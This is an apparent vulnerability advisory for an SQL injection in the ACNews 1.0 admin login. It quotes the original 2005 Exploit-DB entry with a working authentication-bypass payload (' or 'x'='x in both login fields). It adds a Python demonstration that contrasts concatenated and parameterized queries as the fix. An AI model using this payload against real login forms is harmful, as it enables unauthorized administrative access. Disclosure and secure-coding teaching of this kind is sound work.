Vendor: ACNews
By: LaMeR
CVSS: 5.5 (MEDIUM)
Vulnerability Class: SQL injection
CWE: 89
Product Name: ACNews
Affected Version From: ACNews 1.0
Affected Version To: ACNews 1.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2005

ACNews 1.0 SQL Injection

The ACNews 1.0 application is vulnerable to SQL injection in its login form. An attacker can log in by submitting a crafted username and password on the admin/login.asp page.

Mitigation:

To mitigate this vulnerability, the vendor should sanitize user input and use parameterized queries to prevent SQL injection attacks.
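
The difference between a concatenated login query and a parameterized one, as an added example that is not ACNews code and not part of the original advisory. The ACNews source is not shown on this page, so the table, column and function names are hypothetical, and an in-memory SQLite database stands in for the application's own database.

```python
import sqlite3

# The value quoted in the advisory for both the username and password fields.
PAYLOAD = "' or 'x'='x"


def make_db():
    """Build a constructed, in-memory stand-in for the admin user table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (username TEXT, password TEXT)")
    # Plaintext only to keep the example short; store password hashes in practice.
    db.execute("INSERT INTO admins VALUES ('admin', 'constructed-secret')")
    return db


def login_concatenated(db, username, password):
    """Assumed vulnerable pattern: user input is pasted into the SQL text."""
    sql = (
        "SELECT COUNT(*) FROM admins WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    # With PAYLOAD the WHERE clause ends in  ... or 'x'='x'  and is always
    # true, so every row matches without knowing any credential.
    return db.execute(sql).fetchone()[0] > 0


def login_parameterized(db, username, password):
    """Mitigation: input is bound as data and is never parsed as SQL."""
    sql = "SELECT COUNT(*) FROM admins WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone()[0] > 0


def compare(username, password):
    """Return (concatenated_result, parameterized_result) for one attempt."""
    db = make_db()
    try:
        return (
            login_concatenated(db, username, password),
            login_parameterized(db, username, password),
        )
    finally:
        db.close()


if __name__ == "__main__":
    print("advisory payload :", compare(PAYLOAD, PAYLOAD))
    print("valid credentials:", compare("admin", "constructed-secret"))
    print("wrong password   :", compare("admin", "wrong"))
```
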
Source

Exploit-DB raw data:

# http://www.google.com/search?hl=en&lr=&q=acnews+1.0+login.asp&btnG=Search
# /str0ke

Product:ACNews
version :1.0
VULNERABILITY CLASS: SQL injection

[exploit]
Log in with
username:' or 'x'='x
password :' or 'x'='x
from admin/login.asp page.

greetz to HaXoR & LOverboy

author : LaMeR

securitygurus team

# milw0rm.com [2005-04-09]